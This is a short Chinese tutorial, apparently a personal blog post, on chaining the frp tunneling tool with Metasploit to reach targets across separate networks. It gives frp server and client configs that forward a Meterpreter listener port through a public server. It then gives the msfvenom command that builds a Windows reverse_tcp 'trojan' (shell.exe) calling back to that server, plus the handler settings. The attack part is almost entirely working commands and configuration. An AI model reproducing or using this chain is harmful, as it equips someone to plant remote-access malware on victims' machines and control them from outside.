frp内网穿透结合metasploit

1.frp是一款免费的内网穿透工具，当两个局域网的时候可以通过这个来进行渗透
2.首先准备一台具有公网的服务器
3.和ftp一样都是具有s端和c端的，s端下载和c端下载一定要保持版本号一直，再根据不同的内核下载不同的压缩包。

• 比如s端：
  wget https://github.com/fatedier/frp/releases/frp_0.33.0_linux_amd64.tar.gz
• 比如c端：
  wget https://github.com/fatedier/frp/releases/frp_0.33.0_darwin_amd64.tar.gz

4.服务器(只要是入口的都要放行：3999 6000 2333)

tar -zxvf frp_0.33.0_linux_amd64.tar.gz 
#进入frp解压目录
cd frp_0.33.0_linux_amd64.tar.gz
ls
#编辑frps.ini文件
vi frps.ini
#frp服务端与客户端连接端口，frps和frpc必须一致;防火墙放行该端口，
bind_port=39999(默认的是7000被我改了，科莫及～～～)
#启动frps
./frps

5.客户端

[common]
server_addr = 你的服务器ip
server_port = 39999

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 2333

6.服务端和客户端的frp服务运行起来

./frps -c ./frps.ini
./frpc -c ./frpc.ini

7.木马程序制作
结合以前我生成木马的文章，注意点是payload需要和msfvenom -p的payload一样最后exploit才能创建session不关闭。
msfvenom -p windows/meterpreter/reverse_tcp lhost=你的服务器ip lport=2333 -f exe -o /Users/xingwangmingzhe/Downloads/shell.exe
set LHOST 127.0.0.1
set LPORT 4444